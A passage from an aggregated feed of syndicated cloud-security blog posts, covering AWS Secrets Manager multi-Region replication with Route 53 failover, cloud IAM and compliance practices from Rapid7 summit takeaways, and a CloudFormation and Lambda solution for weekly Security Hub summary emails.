  • An Amazon RDS – MySQL DB instance that is running in the primary Region and configured for replication to the replica Region. To set up read replicas or cross-Region replicas for Amazon RDS, see Working with read replicas.
  • A secret created in Secrets Manager and configured for replication for the replica Region.
  • AWS Lambda functions (running on Python 3) deployed in the primary and replica Regions acting as clients to the MySQL DBs.

This architecture is illustrated in Figure 1.

Figure 1: Architecture overview for a multi-Region secret replication with the primary Region active

In the primary Region (us-east-1), the Lambda function uses the credentials stored in the secret to access the database, as indicated by the following steps in Figure 1:

  1. The Lambda function sends a request to Secrets Manager to retrieve the secret value by using the GetSecretValue API call. Secrets Manager retrieves the secret value for the Lambda function.
  2. The Lambda function uses the secret value to connect to the database in order to read/write data.

The replicated secret in us-west-2 points to the primary DB instance in us-east-1. This is because when Secrets Manager replicates the secret, it replicates the secret value and all the associated metadata, such as the database endpoint. The database endpoint details are stored within the secret because Secrets Manager uses this information to connect to the database and rotate the secret if it is configured for automatic rotation. The Lambda function can also use the database endpoint details in the secret to connect to the database.

To simplify database failover during disaster recovery, as I’ll cover later in the post, you can configure an Amazon Route 53 CNAME record for the database endpoint in the primary Region. The database host associated with the secret is configured with the database CNAME record. When the primary Region is operating normally, the CNAME record points to the database endpoint in the primary Region. The requests to the database CNAME are routed to the DB instance in the primary Region, as shown in Figure 1.

During disaster recovery, you can failover to the replica Region, us-west-2, to make it possible for your application running in this Region to access the Amazon RDS read replica in us-west-2 by using the secret stored in the same Region. As part of your failover script, the database CNAME record should also be updated to point to the database endpoint in us-west-2. Because the database CNAME is used to point to the database endpoint within the secret, your application in us-west-2 can now use the replicated secret to access the database read replica in this Region. Figure 2 illustrates this disaster recovery scenario.

Figure 2: Architecture overview for a multi-Region secret replication with the replica Region active
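As part of the failover script described above, the CNAME update can be a single Route 53 API call. The following is a minimal boto3 sketch; the hosted zone ID, record name, and replica endpoint are placeholders:

import boto3

route53 = boto3.client("route53")

def point_cname_to_replica(hosted_zone_id, record_name, replica_db_endpoint):
    # UPSERT the database CNAME so applications (and the replicated secret)
    # resolve to the DB instance in the recovery Region.
    route53.change_resource_record_sets(
        HostedZoneId=hosted_zone_id,
        ChangeBatch={
            "Comment": "Fail over the database CNAME to the replica Region",
            "Changes": [{
                "Action": "UPSERT",
                "ResourceRecordSet": {
                    "Name": record_name,
                    "Type": "CNAME",
                    "TTL": 60,
                    "ResourceRecords": [{"Value": replica_db_endpoint}],
                },
            }],
        },
    )

# Example call with placeholder values:
# point_cname_to_replica("Z0123456789ABC", "db.example.com",
#                        "mydb.xxxxxxxx.us-west-2.rds.amazonaws.com")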

Prerequisites

The procedure described in this blog post requires that you complete the following steps before starting the procedure:

  1. Configure an Amazon RDS DB instance in the primary Region, with replication configured in the replica Region.
  2. Configure a Route 53 CNAME record for the database endpoint in the primary Region.
  3. Configure the Lambda function to connect with the Amazon RDS database and Secrets Manager by following the procedure in this blog post.
  4. Sign in to the AWS Management Console using a role that has SecretsManagerReadWrite permissions in the primary and replica Regions.

Enable replication for secrets stored in Secrets Manager

In this section, I walk you through the process of enabling replication in Secrets Manager for:

  1. A new secret that is created for your Amazon RDS database credentials
  2. An existing secret that is not configured for replication

For the first scenario, I show you the steps to create a secret in Secrets Manager in the primary Region (us-east-1) and enable replication for the replica Region (us-west-2).

To create a secret with replication enabled

  1. In the AWS Management Console, navigate to the Secrets Manager console in the primary Region (N. Virginia).
  2. Choose Store a new secret.
  3. On the Store a new secret screen, enter the Amazon RDS database credentials that will be used to connect with the Amazon RDS DB instance. Select the encryption key and the Amazon RDS DB instance, and then choose Next.
  4. Enter the secret name of your choice, and then enter a description. You can also optionally add tags and resource permissions to the secret.
  5. Under Replicate Secret – optional, choose Replicate secret to other regions.

    Figure 3: Replicate a secret to other Regions

  6. For AWS Region, choose the replica Region, US West (Oregon) us-west-2. For Encryption Key, choose Default to store your secret in the replica Region. Then choose Next.

    Figure 4: Configure secret replication

  7. In the Configure Rotation section, you can choose whether to enable rotation. For this example, I chose not to enable rotation, so I selected Disable automatic rotation. However, if you want to enable rotation, you can do so by following the steps in Enabling rotation for an Amazon RDS database secret in the Secrets Manager User Guide. When you enable rotation in the primary Region, any changes to the secret from the rotation process are also replicated to the replica Region. After you’ve configured the rotation settings, choose Next.
  8. On the Review screen, you can see the summary of the secret configuration, including the secret replication configuration.

    Figure 5: Review the secret before storing

  9. At the bottom of the screen, choose Store.
  10. At the top of the next screen, you’ll see two banners that provide status on:
    • The creation of the secret in the primary Region
    • The replication of the secret in the Secondary Region

    After the creation and replication of the secret is successful, the banners will provide you with confirmation details.

At this point, you’ve created a secret in the primary Region (us-east-1) and enabled replication in a replica Region (us-west-2). You can now use this secret in the replica Region as well as the primary Region.

Now suppose that you have a secret created in the primary Region (us-east-1) that hasn’t been configured for replication. You can also configure replication for this existing secret by using the following procedure.

To enable multi-Region replication for existing secrets

  1. In the Secrets Manager console, choose the secret name. At the top of the screen, choose Replicate secret to other regions.
    Figure 6: Enable replication for existing secrets

    This opens a pop-up screen where you can configure the replica Region and the encryption key for encrypting the secret in the replica Region.

  2. Choose the AWS Region and encryption key for the replica Region, and then choose Complete adding region(s).
    Figure 7: Configure replication for existing secrets

    This starts the process of replicating the secret from the primary Region to the replica Region.

  3. Scroll down to the Replicate Secret section. You can see that the replication to the us-west-2 Region is in progress.
    Figure 8: Review progress for secret replication

    After the replication is successful, you can look under Replication status to review the replication details that you’ve configured for your secret. You can also choose to replicate your secret to more Regions by choosing Add more regions.

    Figure 9: Successful secret replication to a replica Region
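The same can be done programmatically for an existing secret by calling the ReplicateSecretToRegions API. Here is a minimal boto3 sketch; the secret name is a placeholder:

import boto3

secretsmanager = boto3.client("secretsmanager", region_name="us-east-1")

# Add a read replica of an existing secret in us-west-2
response = secretsmanager.replicate_secret_to_regions(
    SecretId="prod/mysql/credentials",      # placeholder secret name or ARN
    AddReplicaRegions=[
        {"Region": "us-west-2"}             # optionally include a "KmsKeyId"
    ],
)

for status in response["ReplicationStatus"]:
    print(status["Region"], status["Status"])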

Update the secret with the CNAME record

Next, you can update the host value in your secret to the CNAME record of the DB instance endpoint. This will make it possible for you to use the secret in the replica Region without making changes to the replica secret. In the event of a failover to the replica Region, you can simply update the CNAME record to the DB instance endpoint in the replica Region as a part of your failover script.

To update the secret with the CNAME record

  1. Navigate to the Secrets Manager console, and choose the secret that you have set up for replication.
  2. In the Secret value section, choose Retrieve secret value, and then choose Edit.
  3. Update the secret value for the host with the CNAME record, and then choose Save.

    Figure 10: Edit the secret value

  4. After you choose Save, you’ll see a banner at the top of the screen with a message indicating that the secret was successfully edited. Because the secret is set up for replication, you can also review the status of the synchronization of your secret to the replica Region after you update the secret. To do so, scroll down to the Replicate Secret section and look under Region Replication Status.

    Figure 11: Successful secret replication for a modified secret

Access replicated secrets from the replica Region

Now that you’ve configured the secret for replication in the primary Region, you can access the secret from the replica Region. Here I demonstrate how to access a replicated secret from a simple Lambda function that is deployed in the replica Region (us-west-2).

To access the secret from the replica Region

  1. From the AWS Management Console, navigate to the Secrets Manager console in the replica Region (Oregon) and view the secret that you configured for replication in the primary Region (N. Virginia).

    Figure 12: View secrets that are configured for replication in the replica Region

  2. Choose the secret name and review the details that were replicated from the primary Region. A secret that is configured for replication will display a banner at the top of the screen stating the replication details.

    Figure 13: The replication status banner

  3. Under Secret Details, you can see the secret’s ARN. You can use the secret’s ARN to retrieve the secret value from the Lambda function or application that is deployed in your replica Region (Oregon). Make a note of the ARN.

    Figure 14: View secret details

During a disaster recovery scenario when the primary Region isn’t available, you can update the CNAME record to point to the DB instance endpoint in us-west-2 as part of your failover script. For this example, my application that is deployed in the replica Region is configured to use the replicated secret’s ARN.

Let’s suppose your sample Lambda function defines the secret name and the Region in the environment variables. The REGION_NAME environment variable contains the name of the replica Region; in this example, us-west-2. The SECRET_NAME environment variable is the ARN of your replicated secret in the replica Region, which you noted earlier.

Figure 15: Environment variables for the Lambda function

In the replica Region, you can now refer to the secret’s ARN and Region in your Lambda function code to retrieve the secret value for connecting to the database. The following sample Lambda function code snippet uses the secret_name and region_name variables to retrieve the secret’s ARN and the replica Region values stored in the environment variables.

import os
import json

import boto3
from botocore.exceptions import ClientError

secret_name = os.environ['SECRET_NAME']
region_name = os.environ['REGION_NAME']

def openConnection():
    # Create a Secrets Manager client in the replica Region
    session = boto3.session.Session()
    client = session.client(
        service_name='secretsmanager',
        region_name=region_name
    )
    try:
        get_secret_value_response = client.get_secret_value(
            SecretId=secret_name
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'DecryptionFailureException':
            # Secrets Manager couldn't decrypt the secret with the configured KMS key
            raise e
        # The full sample handles additional error codes here
        raise e
    # The secret string holds the database credentials and host (the CNAME record);
    # the rest of the function would use these values to open the MySQL connection.
    secret = json.loads(get_secret_value_response['SecretString'])
    return secret

Alternatively, you can simply use the Python 3 sample code for the replicated secret to retrieve the secret value from the Lambda function in the replica Region. You can review the provided sample code by navigating to the secret details in the console, as shown in Figure 16.

Figure 16: Python 3 sample code for the replicated secret

Summary

When you plan for disaster recovery, you can configure replication of your secrets in Secrets Manager to provide redundancy for your secrets. This feature reduces the overhead of deploying and maintaining additional configuration for secret replication and retrieval across AWS Regions. In this post, I showed you how to create a secret and configure it for multi-Region replication. I also demonstrated how you can configure replication for existing secrets across multiple Regions.

I showed you how to use secrets from the replica Region and configure a sample Lambda function to retrieve a secret value. When replication is configured for secrets, you can use this technique to retrieve the secrets in the replica Region in a similar way as you would in the primary Region.

You can start using this feature through the AWS Secrets Manager console, AWS Command Line Interface (AWS CLI), AWS SDK, or AWS CloudFormation. To learn more about this feature, see the AWS Secrets Manager documentation. If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, start a new thread on the AWS Secrets Manager forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Fatima Ahmed

Fatima is a Security Global Practice Lead at AWS. She is passionate about cybersecurity and helping customers build secure solutions in the AWS Cloud. When she is not working, she enjoys time with her cat or solving cryptic puzzles.

IAM Never Gonna Give You Up, Never Gonna Breach Your Cloud

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/03/03/iam-never-gonna-give-you-up-never-gonna-breach-your-cloud/

This blog is part of an ongoing series sharing key takeaways from Rapid7’s 2020 Cloud Security Executive Summit. Interested in participating in the next summit on Tuesday, March 9? Register here!

Identity and access management (IAM) credentials have solved myriad security issues, but the recent cloud-based IAM movement has left many scratching their heads as to why it can be so complex.

IAM on-premises vs. IAM off-premises

IAM on-premises, well, it’s become a whole lot simpler. In many organizations, it is LDAP-based, so most things are tied back into it, such as database credentials and system accounts. There are more known processes and ways to deal with those. However, when it comes to the cloud, organizations now have to deal with inheritance and different aspects that may not correlate back to the on-premises world. These new concepts, new constructs, and different ways to interact can be overwhelming.

Complexity can really become an issue with something like assume-role in AWS. Going to a least-privileged model can frustrate people, so they may just want access to everything on a given surface, promising to scale the permissions back later. The worry there is that you can end up with over-permissioned identities that never get fixed. With assume-role in particular, credentials are no longer stored inside a physical operating system, but rather in a metadata layer associated with a piece of infrastructure. This applies to a number of different services within the cloud provider — everything from compute instances, to database instances, to storage assets, and more. These aspects can all be very complex to secure, but there’s no question the approach makes operations safer.
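For readers less familiar with the mechanics, here is a minimal boto3 sketch of explicitly assuming a role to obtain short-lived credentials; the role ARN is a placeholder. Instance profiles use the same mechanism behind the scenes, which is why the resulting credentials live in instance metadata rather than on disk.

import boto3

sts = boto3.client("sts")

# Request short-lived credentials for a narrowly scoped role (placeholder ARN)
assumed = sts.assume_role(
    RoleArn="arn:aws:iam::123456789012:role/ReadOnlyAuditor",
    RoleSessionName="audit-session",
    DurationSeconds=900,
)
credentials = assumed["Credentials"]

# Use the temporary credentials instead of long-lived access keys
s3 = boto3.client(
    "s3",
    aws_access_key_id=credentials["AccessKeyId"],
    aws_secret_access_key=credentials["SecretAccessKey"],
    aws_session_token=credentials["SessionToken"],
)
print([bucket["Name"] for bucket in s3.list_buckets()["Buckets"]])

Speaking of safe…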

Going fast vs. going safe

This may be stating the obvious, but a general sentiment of feature developers is that they aren’t all that excited about security. Often, this is because their jobs may depend on speed—they’re told to go fast. A main value prop on the cloud is that teams buy into the sentiment of “I can be as agile as I need to be, I can be as quick as I need to be.” So there’s a sort of relief at that, but it’s very likely those teams are also told, “Make sure we don’t have incidents, data breaches, or data exposures.” A tension can grow from increased use of the cloud and operational offloading of IAM protocols. In this case, keeping things as simple as possible is a way to maintain efficient processes and keep them moving. What are some tools organizations can use to lessen friction between developer teams and security?  

Service-control policies and session-control policies

If there’s an umbrella structure sitting over your cloud accounts, or over groupings like Google Cloud projects, policies can be pushed down from the top level with service-control policies. A session policy is generated either from the user side, from an application, or from an assume-role. Going even further, there’s also an identity policy associated with each individual in an active session. With all of this potential complexity, how would organizations go about simplifying, especially as they shift authentication to the cloud?

The above process does provide an abundance of granularity as well as freedom to explicitly allow or deny at many, many levels. The flipside of that, of course, is that there are many, many levels.  

  • Leverage all aspects: Some companies may restrict access to specific services or regions. They may also not want teams using just any cloud service, because of the IAM implications, depending on the level of security in the organization. So it’s about tailoring a set of policies to specific goals (a policy sketch follows this list).
  • Pre-canned policies: Leveraging automation, it might be faster to deploy these types of policies while also leaving room for a certain amount of autonomy. In this way, teams can tailor some resource-level access standards.
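To make the first point concrete, here is a minimal sketch of a Region-restriction service control policy created with boto3, assuming you manage accounts through AWS Organizations. The policy name and the approved Regions are hypothetical, and a production SCP would typically also exempt global services.

    import json
    import boto3

    # Hypothetical guardrail: deny actions outside two approved Regions.
    region_guardrail = {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Deny",
            "Action": "*",
            "Resource": "*",
            "Condition": {
                "StringNotEquals": {"aws:RequestedRegion": ["us-east-1", "eu-west-1"]}
            }
        }]
    }

    organizations = boto3.client("organizations")
    policy = organizations.create_policy(
        Name="deny-unapproved-regions",  # hypothetical name
        Description="Restrict activity to approved Regions",
        Type="SERVICE_CONTROL_POLICY",
        Content=json.dumps(region_guardrail),
    )
    print(policy["Policy"]["PolicySummary"]["Id"])

The policy only takes effect once it is attached to an organizational unit or account (for example, with attach_policy), which is where the tailoring to specific goals happens.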

Again, based on a company’s specific goals, these types of processes can help ease friction between teams looking to ship a project fast and those trying their best to keep them secure.

Seeing it and protecting it

At the end of the day, the feeling from much of the security world is that visibility has to be there for SecOps to be able to tell you that something is secure. They may not need to go inside and read the data, but if there is no visibility, they can’t comment on any aspect of configuration. An old idea around securing infrastructure is that everything in a private network is implicitly authorized to access everything else. So, once a security checkpoint is crossed, anything could be accessed.

Of course, this whole process aims to improve incident-response efficiency by applying security controls at every step of the kill chain. That means not assuming identities and not trusting anybody by default, also known as zero trust. Therefore, if the information on your website is super-secret, it might make sense to put it behind a VPN for that extra layer of security—even if you have HTTPS with authentication and authorization—against someone who might not be part of the team.

A zero-trust initiative opens the discussion of workload identity in the cloud. Teams could use the cloud provider’s native services (in Google Cloud or AWS, for example) to ensure apps are talking to each other and authenticating properly, and that connections originate from the right machines.

Identity is everything

At the end of the day, it’s never about invasion of any sort of privacy. It’s all about securing as much as you can and authenticating connections to protect against threats. A combination of technical processes and open communication is key in mitigating the challenges of protecting against those threats in a cloud-based IAM solution.

Want to learn more? Register for the upcoming Cloud Security Executive Summit on March 9 to hear industry-leading experts discuss the critical issues affecting cloud security today.

How to Achieve and Maintain Continuous Cloud Compliance

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/03/01/how-to-achieve-and-maintain-continuous-cloud-compliance/

How to Achieve and Maintain Continuous Cloud Compliance

This blog is part of an ongoing series sharing key takeaways from Rapid7’s 2020 Cloud Security Executive Summit. Interested in participating in the next summit on Tuesday, March 9? Register here!

There are two things that make data a hot topic. First, keeping track of your organization’s sheer volume of data is extremely difficult. Second, the evolving nature of the threat and threat-vector landscape can make data management and protection astonishingly challenging. We should be focused on staying compliant in the present, but also paying attention to and evolving for what’s coming in the near future.

Why is it so hard to achieve continuous compliance in the cloud?

Getting it all right and continuously achieving compliance can be taxing on any security organization, and the cloud adds another layer of mobility to this. Pushing more operations into the cloud has so many “shiny” benefits that losing direct visibility into your physical environment can be an easy drawback to overlook, and its true impact may not be felt until much later.

People can also be a big x-factor when it comes to cloud compliance. For years, your workforce has been trained in one area of compliance, and now you might have to take such measures as hiring new talent or retraining existing employees in proper cloud-compliance methodologies. So, it’s certainly worth it to regularly take a hard look at your existing policies, because the last thing anyone wants is for their compliance to be out-of-date and no longer addressing the right issues.

Taking these considerations into account, and given the ephemeral nature of the cloud in general, is continuous cloud compliance even achievable?

The answer is yes, but of course it depends on what you’re trying to be compliant with. You might meet all of the laws, rules, and regulations in your industry while still not mitigating all of the risks. Going beyond the letter of those requirements means ensuring you have preventative controls in place, as well as continuous monitoring and scanning, so that you can identify threats faster and mitigate more overall risk.

Therefore, the answer will be different for each organization as goals are defined and you go about building a unique and continuous cloud-compliant solution. A more specific goal would come back to people and ensuring they work within the guardrails you set for them in your monitoring and preventative measures.

Changing the culture of blame

What happens when unencrypted data ends up in the cloud? Is the engineer to blame? The security team? Is your organization properly calibrated to share accountability with other teams, or does responsibility end with you? There is no question that continuous compliance takes constant teamwork that revolves around being solution-oriented and learning to not “point the finger.” It’s important that all players are comfortable asking for help and, in a worst-case scenario, don’t feel scared for their jobs.

Innovation comes from experimentation, and personnel should feel a certain amount of freedom to experiment, as well as to identify when things go wrong and own it. Sourcing the right talent plays a big role in changing the culture of blame. On-premises skills are different from cloud-based ones. For instance, an engineer who is great at automation on-premises could struggle in the cloud, simply because there is a new spectrum of vocabulary to learn. It’s key to source talent that’s eager to learn, so that the whole team can ultimately become successful in this new environment.

Constant tuning

It would be amazing if there were a big red easy button for automating compliance and calling it done. Even as automation becomes easier, it will still take vigilance to optimize processes as budgets are freed up and stakeholders decide where that money should be spent. Have the conversation about the cost of compliance at the beginning of a project; otherwise, you might delay it for a long period of time and then spend $100 million more to become compliant. Getting everyone on the same page early can save lots of red-tape cutting and, of course, money.

Want to learn more? Register for the upcoming Cloud Security Executive Summit on March 9 to hear industry-leading experts discuss the critical issues affecting cloud security today.

How to set up a recurring Security Hub summary email

Post Syndicated from Justin Criswell original https://aws.amazon.com/blogs/security/how-to-set-up-a-recurring-security-hub-summary-email/

AWS Security Hub provides a comprehensive view of your security posture in Amazon Web Services (AWS) and helps you check your environment against security standards and best practices. In this post, we’ll show you how to set up weekly email notifications using Security Hub to provide account owners with a summary of the existing security findings to prioritize, new findings, and links to the Security Hub console for more information.

When you enable Security Hub, it collects and consolidates findings from AWS security services that you’re using, such as intrusion detection findings from Amazon GuardDuty, vulnerability scans from Amazon Inspector, Amazon Simple Storage Service (Amazon S3) bucket policy findings from Amazon Macie, publicly accessible and cross-account resources from IAM Access Analyzer, and resources lacking AWS WAF coverage from AWS Firewall Manager. Security Hub also consolidates findings from integrated AWS Partner Network (APN) security solutions.

Cloud security processes can differ from traditional on-premises security in that security is often decentralized in the cloud. With traditional on-premises security operations, security alerts are typically routed to centralized security teams operating out of security operations centers (SOCs). With cloud security operations, it’s often the application builders or DevOps engineers who are best situated to triage, investigate, and remediate the security alerts. This integration of security into DevOps processes is referred to as DevSecOps, and as part of this approach, centralized security teams look for additional ways to proactively engage application account owners in improving the security posture of AWS accounts.

This solution uses Security Hub custom insights, AWS Lambda, and the Security Hub API. A custom insight is a collection of findings that are aggregated by a grouping attribute, such as severity or status. Insights help you identify common security issues that might require remediation action. Security Hub includes several managed insights, or you can create your own custom insights. Amazon SNS topic subscribers will receive an email, similar to the one shown in Figure 1, that summarizes the results of the Security Hub custom insights.

Figure 1: Example email with a summary of security findings for an account

Solution overview

This solution assumes that Security Hub is enabled in your AWS account. If it isn’t enabled, set up the service so that you can start seeing a comprehensive view of security findings across your AWS accounts.

A recurring Security Hub summary email provides recipients with a proactive communication that summarizes the security posture and any recent improvements within their AWS accounts. The email message is built from the results of seven Security Hub custom insights and links back to the Security Hub console for each.

Here’s how the solution works:

  1. Seven Security Hub custom insights are created when you first deploy the solution.
  2. An Amazon CloudWatch time-based event invokes a Lambda function for processing.
  3. The Lambda function gets the results of the custom insights from Security Hub, formats the results for email, and sends a message to Amazon SNS.
  4. Amazon SNS sends the email notification to the address you provided during deployment.
  5. The email includes the summary and links to the Security Hub UI so that the recipient can follow the remediation workflow.

Figure 2 shows the solution workflow.

Figure 2: Solution overview, deployed through AWS CloudFormation

Security Hub custom insight

The finding results presented in the email are summarized by Security Hub custom insights. A Security Hub insight is a collection of related findings. Each insight is defined by a group by statement and optional filters. The group by statement indicates how to group the matching findings, and identifies the type of item that the insight applies to. For example, if an insight is grouped by resource identifier, then the insight produces a list of resource identifiers. The optional filters narrow down the matching findings for the insight. For example, you might want to see only the findings from specific providers or findings associated with specific types of resources. Figure 3 shows the seven custom insights that are created as part of deploying this solution.

Figure 3: Custom insights created by the solution

Sample custom insight

Security Hub offers several built-in managed (default) insights. You can’t modify or delete managed insights. You can view the custom insights created as part of this solution in the Security Hub console under Insights, by selecting the Custom Insights filter. From the email, follow the link for “Summary Email – 02 – Failed AWS Foundational Security Best Practices” to see the summarized finding counts, as well as graphs with related data, as shown in Figure 4.

Figure 4: Detail view of the email titled “Summary Email – 02 – Failed AWS Foundational Security Best Practices”

Let’s evaluate the filters that create this custom insight:

  • Type is “Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices” – Captures all current and future findings created by the security standard AWS Foundational Security Best Practices.
  • Status is FAILED – Captures findings where the compliance status of the resource doesn’t pass the assessment.
  • Workflow Status is not SUPPRESSED – Captures findings where Security Hub users haven’t updated the finding to the SUPPRESSED status.
  • Record State is ACTIVE – Captures findings that represent the latest assessment of the resource. Security Hub automatically archives control-based findings if the associated resource is deleted, the resource does not exist, or the control is disabled.
  • Group by SeverityLabel – Creates the insight and populates the counts.
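For reference, a roughly equivalent insight can also be created programmatically. The following boto3 sketch mirrors the filters listed above; it is an illustration rather than the exact code deployed by the solution’s CloudFormation template, and the comparison operators are assumptions.

    import boto3

    securityhub = boto3.client("securityhub")

    # Failed, active, non-suppressed findings from the AWS Foundational
    # Security Best Practices standard, grouped by severity label.
    response = securityhub.create_insight(
        Name="Summary Email - 02 - Failed AWS Foundational Security Best Practices",
        GroupByAttribute="SeverityLabel",
        Filters={
            "Type": [{
                "Value": "Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices",
                "Comparison": "EQUALS",
            }],
            "ComplianceStatus": [{"Value": "FAILED", "Comparison": "EQUALS"}],
            "WorkflowStatus": [{"Value": "SUPPRESSED", "Comparison": "NOT_EQUALS"}],
            "RecordState": [{"Value": "ACTIVE", "Comparison": "EQUALS"}],
        },
    )
    print(response["InsightArn"])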

Solution artifacts

The solution provided with this blog post consists of two files:

  1. An AWS CloudFormation template named security-hub-email-summary-cf-template.json.
  2. A zip file named sec-hub-email.zip for the Lambda function that generates the Security Hub summary email.

In addition to the Security Hub custom insights as discussed in the previous section, the solution also deploys the following artifacts:

  1. An Amazon Simple Notification Service (Amazon SNS) topic named SecurityHubRecurringSummary and an email subscription to the topic.
    Figure 5: SNS topic created by the solution

    The email address that subscribes to the topic is captured through a CloudFormation template input parameter. The subscriber is notified by email to confirm the subscription, and after confirmation, the subscription to the SNS topic is created.

    Figure 6: SNS email subscription

  2. Two Lambda functions:
    1. A Lambda function named *-CustomInsightsFunction-* is used only by the CloudFormation template to create the custom insights.
    2. A Lambda function named SendSecurityHubSummaryEmail queries the custom insights from the Security Hub API and uses the insights’ data to create the summary email message. The function then sends the email message to the SNS topic. (A simplified sketch of this logic appears after this list.)

      Figure 7: Example of Lambda functions created by the solution

  3. Two IAM roles for the Lambda functions provide the following rights, respectively:
    1. The minimum rights required to create insights and to create CloudWatch log groups and logs.
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": [
                      "logs:CreateLogGroup",
                      "logs:CreateLogStream",
                      "logs:PutLogEvents"
                  ],
                  "Resource": "arn:aws:logs:*:*:*",
                  "Effect": "Allow"
              },
              {
                  "Action": [
                      "securityhub:CreateInsight"
                  ],
                  "Resource": "*",
                  "Effect": "Allow"
              }
          ]
      }
      

    2. The minimum rights required to query Security Hub insights and to send email messages to the SNS topic named SecurityHubRecurringSummary.
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": "sns:Publish",
                  "Resource": "arn:aws:sns:[REGION]:[ACCOUNT-ID]:SecurityHubRecurringSummary",
                  "Effect": "Allow"
              }
          ]
      }

      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Effect": "Allow",
                  "Action": [
                      "securityhub:Get*",
                      "securityhub:List*",
                      "securityhub:Describe*"
                  ],
                  "Resource": "*"
              }
          ]
      }             
      

  4. A CloudWatch scheduled event named SecurityHubSummaryEmailSchedule for invoking the Lambda function that generates the summary email. The default schedule is every Monday at 8:00 AM GMT. This schedule can be overridden by using a CloudFormation input parameter. Learn more about creating Cron expressions.

    Figure 8: Example of CloudWatch schedule created by the solution
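As a rough illustration of the SendSecurityHubSummaryEmail function described above, the following boto3 sketch shows the general shape of that logic: query each insight, format the counts, and publish to the SNS topic. The environment variable names here are hypothetical, and the deployed function is more elaborate.

    import os
    import boto3

    securityhub = boto3.client("securityhub")
    sns = boto3.client("sns")

    def lambda_handler(event, context):
        # Hypothetical configuration; the real function gets these values
        # from the CloudFormation stack.
        insight_arns = os.environ["INSIGHT_ARNS"].split(",")
        topic_arn = os.environ["TOPIC_ARN"]

        lines = []
        for arn in insight_arns:
            insight = securityhub.get_insights(InsightArns=[arn])["Insights"][0]
            results = securityhub.get_insight_results(InsightArn=arn)["InsightResults"]
            lines.append(insight["Name"])
            for value in results["ResultValues"]:
                lines.append(f"  {value['GroupByAttributeValue']}: {value['Count']}")

        sns.publish(
            TopicArn=topic_arn,
            Subject="AWS Security Hub summary",
            Message="\n".join(lines),
        )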

Deploy the solution

The following steps demonstrate the deployment of this solution in a single AWS account and Region. Repeat these steps in each of the AWS accounts that are active with Security Hub, so that the respective application owners can receive the relevant data from their accounts.

To deploy the solution

  1. Download the CloudFormation template security-hub-email-summary-cf-template.json and the .zip file sec-hub-email.zip from https://github.com/aws-samples/aws-security-hub-summary-email.
  2. Copy security-hub-email-summary-cf-template.json and sec-hub-email.zip to an S3 bucket within your target AWS account and Region. Copy the object URL for the CloudFormation template .json file.
  3. In the AWS Management Console, open the CloudFormation service and choose Create stack with new resources.

    Figure 9: Create stack with new resources

  4. Under Specify template, in the Amazon S3 URL textbox, enter the S3 object URL for the file security-hub-email-summary-cf-template.json that you uploaded in step 2.

    Figure 10: Specify S3 URL for CloudFormation template

  5. Choose Next. On the next page, under Stack name, enter a name for the stack.

    Figure 11: Enter stack name

  6. On the same page, enter values for the input parameters. These are the input parameters that are required for this CloudFormation template:
    1. S3 Bucket Name: The S3 bucket where the .zip file for the Lambda function (sec-hub-email.zip) is stored.
    2. S3 key name (with prefixes): The S3 key name (with prefixes) for the .zip file for the Lambda function.
    3. Email address: The email address of the subscriber to the Security Hub summary email.
    4. CloudWatch Cron Expression: The Cron expression for scheduling the Security Hub summary email. The default is every Monday 8:00 AM GMT. Learn more about creating Cron expressions.
    5. Additional Footer Text: Text that will appear at the bottom of the email message. This can be useful to guide the recipient on next steps or provide internal resource links. This is an optional parameter; leave it blank for no text.
    Figure 12: Enter CloudFormation parameters

  7. Choose Next.
  8. Keep all defaults in the screens that follow, and choose Next.
  9. Select the check box I acknowledge that AWS CloudFormation might create IAM resources, and then choose Create stack.

Test the solution

You can send a test email after the deployment is complete. To do this, navigate to the Lambda console and locate the Lambda function named SendSecurityHubSummaryEmail. Perform a manual invocation with any event payload to receive an email within a few minutes. You can repeat this procedure as many times as you wish.
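If you prefer to trigger the test invocation from code rather than the console, a minimal boto3 sketch follows; adjust the function name to match the one your stack actually created, and note that the payload content is ignored.

    import json
    import boto3

    lambda_client = boto3.client("lambda")

    response = lambda_client.invoke(
        FunctionName="SendSecurityHubSummaryEmail",  # adjust to your deployed name
        Payload=json.dumps({}).encode("utf-8"),      # any payload works for this function
    )
    print(response["StatusCode"])  # 200 indicates a successful synchronous invocation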

Conclusion

We’ve outlined an approach for rapidly building a solution for sending a weekly summary of the security posture of your AWS account as evaluated by Security Hub. This solution makes it easier for you to be diligent in reviewing any outstanding findings and to remediate findings in a timely way based on their severity. You can extend the solution in many ways, including:

  1. Add links in the footer text to the remediation workflows, such as creating a ticket for ServiceNow or any Security Information and Event Management (SIEM) that you use.
  2. Add links to internal wikis for workflows like organizational exceptions to vulnerabilities or other internal processes.
  3. Extend the solution by modifying the custom insights content, email content, and delivery frequency.

To learn more about how to set up and customize Security Hub, see these additional blog posts.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Justin Criswell

Justin is a Senior Security Specialist Solutions Architect at AWS. His background is in cloud security and customer success. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS Security Services to increase visibility and reduce risk.

Author

Kavita Mahajan

Kavita is a Senior Partner Solutions Architect at AWS. She has a background in building software systems for the financial sector, specifically insurance and banking. Currently, she is focused on helping AWS partners develop capabilities, grow their practices, and innovate on the AWS platform to deliver the best possible customer experience.

Why More Teams are Shifting Security Analytics to the Cloud This Year

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/17/why-more-teams-are-shifting-security-analytics-to-the-cloud-this-year/

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed. An ESG study found that 63% of organizations say security is more difficult than it was two years ago, citing the growing attack surface, increasing alert volumes, and limited team bandwidth as key reasons.

